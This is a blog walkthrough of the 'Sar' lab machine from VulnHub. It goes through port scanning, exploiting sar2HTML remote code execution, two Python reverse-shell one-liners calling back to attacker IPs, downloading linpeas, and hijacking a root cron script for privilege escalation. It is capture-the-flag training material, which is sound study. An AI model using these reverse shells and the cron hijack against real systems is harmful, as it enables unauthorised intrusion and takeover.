Hello hackers,First of all I would like to tell you this is the first blog i am writing so there can be chances of mistake so please give me your valuable review.
Link-https://www.vulnhub.com/entry/sar-1,425/
Sar is an vulnerable-machine available on vulnhub and offensive security labs it is created to give you the experience of real-world penetration-testing.
So Let’s HACK IT like a 733T.
-Port or Network Scanning-
So, I started with a simple nmap scan which helped to find the open ports,services and OS on the machine.
root@hackit:# nmap -sV -O 192.168.219.35
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-10 11:51 EDT
Nmap scan report for 192.168.219.35
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).Here we got the open ports which are ssh(22) and http(80) so lets enumerate http(ports 80).
A simple Apache2 webserver is running on port 80 with the default apache2 page.
Then i used gobuster to to find the hidden directories and was able to find robots.txt file.
root@hackit:# gobuster dir -u http://192.168.219.35 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.219.35
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/06/10 12:18:06 Starting gobuster in directory enumeration mode
========================`=======================================
/.hta (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 9]
/index.html (Status: 200) [Size: 10918]Opened robots.txt.It contained an single entry named sar2HTML.
I opened the sar2HTML directory and found a web application.Which seems to be interesting.
The best part here is the we have the name and version of the web application on the webpage , it can be useful we can search for publicly available exploits or vulnerabilities.
-Exploitation and Gaining Access-
I searched for the exploits and fortunately got an link of Exploit DB, so according to exploit db installed application is vulnerable to remote code execution.
Exploit Link:https://www.exploit-db.com/exploits/49344
Note: The exploit is written sin python so save it with python extension
After downloading the exploit i executed it with python on my terminal.It asked for URL after entering the URL we got remote code execution.
root@hackit:# python3 sar_exploit.py
Enter The url => http://192.168.219.35/sar2HTML/index.php?plot=HPUX
Command => ls
LICENSE
index.php
sar2html
sarDATA
sarFILECommand => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
It was time to get a reverse shell out of this. I checked wether Python was installed or not and it turns out we can utilize Python3 to get a connection back. Here’s what I used:
Command => python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.54",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'You can find more interesting reverse shells on:
After that I opened my Netcat listner and got the shell.
Now lets make shell more stable using python3 -c “import pty;pty.spawn(‘/bin/bash’)”.
Then lets find our our local.txt or user flag.
$ python3 -c "import pty;pty.spawn('/bin/bash')"www-data@sar:/var/www/html/sar2HTML$ ls
ls
LICENSE index.php sar2html sarDATA sarFILE
www-data@sar:/var/www/html/sar2HTML$ cd /home
cd /home
www-data@sar:/home$ ls
ls
local.txt love
www-data@sar:/home$ cat local.txt
cat local.txt
YOUR FLAG WILL BE HERE
www-data@sar:/home$
For offensive security lab users you will get flag here but for vulnhub users location of flag is:
www-data@sar:/home$ cd love
www-data@sar:/home/love$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos
www-data@sar:/home/love$ cd Desktop
www-data@sar:/home/love/Desktop$ ls
user.txt
www-data@sar:/home/love/Desktop$ cat user.txt
YOUR FLAG WILL BE HERE
www-data@sar:/home/love/Desktop$Privilege Escalation
Now its time for one of my favourite part , Lets transfer linpeas script to this machine using HTTP server to enumerate for privilege esclation,
Link for the tool:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
The best thing about this tool is that it shows all the possible vectors, so you don’t have to read through hunders of lines and commands.
On attacker machine i opend a local http-server using python3 -m http.server 3333 on port 3333.
root@hackit:~[/privilege-escalation-awesome-scripts-suite/linPEAS]# python3 -m http.server 3333
Lets download the script on vulnerable machine
www-data@sar:/home/love/Desktop$ cd /tmpwww-data@sar:/tmp$ wget http://192.168.49.219:3333/linpeas.sh
--2021-06-10 17:25:44-- http://192.168.49.219:3333/linpeas.sh
Connecting to 192.168.49.219:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 319985 (312K) [text/x-sh]
Saving to: 'linpeas.sh'linpeas.sh 100%[===================>] 312.49K 278KB/s in 1.1s2021-06-10 17:25:46 (278 KB/s) - 'linpeas.sh' saved [319985/319985]www-data@sar:/tmp$ chmod +x linpeas.sh
www-data@sar:/tmp$ ./linpeas.sh
./linpeas.sh
Starting linpeas. Caching Writable Folders... ****skipped****SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin*/5 * * * * root cd /var/www/html/ && sudo ./finally.shSHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
HOME=/root
LOGNAME=root
Here we got that a cronjob is running inevery 5 minutes as root which executes the finally.sh shell script in the /var/www/html directory.
Now lets go and see what is fianlly.sh , Unfortunately we do not have write permission on finally.sh i.e. we can not edit it but finally.sh excutes a file write.sh and we are able to edit that file because we have write permissions.
Now lets replace this write.sh with our reverse shell script.Which will give us the reverse connection as root.
So I created a file with the same python reverse shell i used above.
Note:you can use any revese shell above i gave you the link of may reverse shells.
root@hackit:# cat write.sh
#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.219",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'And transferd it using same HTTP server.
www-data@sar:/var/www/html$ rm write.sh
www-data@sar:/var/www/html$ wget http://192.168.49.219:3334/write.sh
--2021-06-10 17:47:15-- http://192.168.49.219:3334/write.sh
Connecting to 192.168.49.219:3334... connected.
HTTP request sent, awaiting response... 200 OK
Length: 245 [text/x-sh]
Saving to: 'write.sh'write.sh 100%[===================>] 245 --.-KB/s in 0.002s2021-06-10 17:47:16 (130 KB/s) - 'write.sh' saved [245/245]www-data@sar:/var/www/html$ chmod 777 write.sh
www-data@sar:/var/www/html$
After approx 5 minutes i got my reverse connection as root.
Now Lets get the root flag.
root@sar:/var/www/html# whoami
root
root@sar:/var/www/html# cd /root
root@sar:~# ls
proof.txt root.txtroot@sar:~# cat proof.txt
YOUR ROOT FLAG WILL BE HERE
root@sar:~#
And with this you have pwned the machine.
Thank you for giving time to read thsi walkthrough. If you found it helpful, please hit the 👏 button and share it with other , if you have any doubt kindly ask it in comments amd please give the feedback in the comments.
For queries and feddback You can also find me on twitter-https://twitter.com/ryotsu_sec
